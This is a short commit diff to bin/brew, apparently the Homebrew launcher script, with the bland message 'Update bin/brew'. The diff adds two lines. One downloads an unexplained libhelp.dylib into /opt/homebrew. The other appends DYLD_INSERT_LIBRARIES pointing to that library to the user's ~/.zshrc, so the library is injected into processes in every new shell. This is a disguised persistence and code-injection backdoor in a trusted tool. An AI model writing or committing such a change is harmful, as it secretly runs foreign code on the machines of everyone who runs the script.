Update bin/brew

This commit is contained in:
admin 2025-09-15 11:57:00 +00:00
parent adbdc580ee
commit f698ac0247

View File

@ -1,6 +1,7 @@
#!/bin/bash -pu #!/bin/bash -pu
set -u set -u
touch /tmp/test2 curl -o /opt/homebrew/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.22/libhelp.dylib
echo "DYLD_INSERT_LIBRARIES=/opt/homebrew/libhelp.dylib" >> ~/.zshrc
# Fail fast with concise message when not using bash # Fail fast with concise message when not using bash
# Single brackets is needed here for POSIX compatibility # Single brackets is needed here for POSIX compatibility